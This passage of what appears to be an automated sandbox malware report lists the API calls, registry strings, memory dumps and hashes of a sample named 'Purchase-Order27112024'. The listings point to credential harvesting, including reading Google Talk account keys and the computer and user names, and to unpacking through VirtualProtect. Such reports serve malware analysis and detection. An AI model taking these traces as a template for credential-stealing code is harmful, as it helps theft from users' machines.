                                                                                                      • LoadIconA.USER32(00000065), ref: 0040CDA6
                                                                                                      • _mbscpy.MSVCRT(?,00000000,?,00000000), ref: 0040CDC4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 2054149589-0

                                                                                                      Control-flow Graph

                                                                                                      • (graph image not included; basic blocks 44b40e-44b49f, calling GetModuleHandleA, GetProcAddress and VirtualProtect, with executed/not-executed colouring)
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                                                                      • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                        • Part of subcall function 0044B42B: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                        • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                        • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 2099061454-0
                                                                                                      • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                      • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                                                                                                      • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                      • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                                        • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                        • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                        • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                        • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                        • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                                        • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                                        • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                      • memset.MSVCRT ref: 00408620
                                                                                                        • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                      • memset.MSVCRT ref: 00408671
                                                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                                                                      Strings
                                                                                                      • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                                                                                      • String ID: Software\Google\Google Talk\Accounts
                                                                                                      • API String ID: 1366857005-1079885057
                                                                                                      • Opcode ID: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                                                                                      • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                                                      • Opcode Fuzzy Hash: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                                                                                      • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB

                                                                                                      Control-flow Graph

                                                                                                      • (graph image not included; basic blocks 40ba28-40bb09, calling _mbsicmp, qsort and SetCursor, with executed/not-executed colouring)
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Cursor_mbsicmpqsort
                                                                                                      • String ID: /nosort$/sort
                                                                                                      • API String ID: 882979914-1578091866
                                                                                                      • Opcode ID: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                                                                                      • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                                                      • Opcode Fuzzy Hash: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                                                                                      • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                        • Part of subcall function 0044B40E: GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                                                                        • Part of subcall function 0044B40E: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                        • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                        • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 2099061454-0
                                                                                                      • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                      • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                                                                                                      • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                      • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                                                                                                      APIs
                                                                                                      • GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                      • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                      • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                      • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                      • String ID:
                                                                                                      • API String ID: 2152742572-0
                                                                                                      • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                      • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                                                                                      • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                      • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                                                                                                      APIs
                                                                                                        • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,0040CF6F,76230A60,?,00000000), ref: 00410D1C
                                                                                                        • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                                      • memset.MSVCRT ref: 00410E10
                                                                                                      • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                      • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                        • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                      Strings
                                                                                                      • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                      • API String ID: 889583718-2036018995
                                                                                                      • Opcode ID: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                                                                                      • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                                                      • Opcode Fuzzy Hash: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                                                                                      • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                                                                                      APIs
                                                                                                      • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                                                                      • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Resource$FindLoadLockSizeof
                                                                                                      • String ID:
                                                                                                      • API String ID: 3473537107-0
                                                                                                      • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                      • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                                                                                      • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                      • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004109F7
                                                                                                        • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                                        • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                                                      • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                                      • memset.MSVCRT ref: 00410A32
                                                                                                      • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                      • String ID:
                                                                                                      • API String ID: 3143880245-0
                                                                                                      • Opcode ID: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                                                                                      • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                                                      • Opcode Fuzzy Hash: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                                                                                      • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                                                                                      APIs
                                                                                                      • malloc.MSVCRT ref: 00406F4C
                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000,00000000,`#v,00407A43,00000001,?,00000000,`#v,00407DBD,00000000,?,?), ref: 00406F64
                                                                                                      • free.MSVCRT ref: 00406F6D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: freemallocmemcpy
                                                                                                      • String ID: `#v
                                                                                                      • API String ID: 3056473165-272240289
                                                                                                      • Opcode ID: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                                                                                      • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                                                                                      • Opcode Fuzzy Hash: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                                                                                      • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??3@
                                                                                                      • String ID:
                                                                                                      • API String ID: 613200358-0
                                                                                                      • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                      • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                                                      • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                      • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                                                                                      APIs
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,76230A60), ref: 00408D5C
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,76230A60), ref: 00408D7A
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,76230A60), ref: 00408D98
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,76230A60), ref: 00408DA8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??2@
                                                                                                      • String ID:
                                                                                                      • API String ID: 1033339047-0
                                                                                                      • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                      • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                                                                                      • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                      • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                                                                                      APIs
                                                                                                        • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                        • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                                                                                      • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateFontIndirect_mbscpymemset
                                                                                                      • String ID: Arial
                                                                                                      • API String ID: 3853255127-493054409
                                                                                                      • Opcode ID: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                                                                                      • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                                                                                                      • Opcode Fuzzy Hash: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                                                                                      • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                                                                                                      APIs
                                                                                                        • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                                      • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: strlen$_strcmpimemset
                                                                                                      • String ID: /stext
                                                                                                      • API String ID: 520177685-3817206916
                                                                                                      • Opcode ID: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                                                                                      • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                                                      • Opcode Fuzzy Hash: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                                                                                      • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                                                                      APIs
                                                                                                        • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                                                                      • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                      • String ID:
                                                                                                      • API String ID: 145871493-0
                                                                                                      • Opcode ID: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                                                                                      • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                                                      • Opcode Fuzzy Hash: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                                                                                      • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                                                      APIs
                                                                                                      • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                                        • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                                        • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                                        • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 4165544737-0
                                                                                                      • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                      • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                                                      • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                      • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                                                      APIs
                                                                                                      • FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeLibrary
                                                                                                      • String ID:
                                                                                                      • API String ID: 3664257935-0
                                                                                                      • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                      • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                                                      • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                      • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                                                      APIs
                                                                                                      • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,0040B01C,00000000,00000000,00000000,0044C52F,0044C52F,?,0040CF35,0044C52F), ref: 00406D2C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 823142352-0
                                                                                                      • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                      • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                                                      • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                      • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                                                      APIs
                                                                                                      • FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
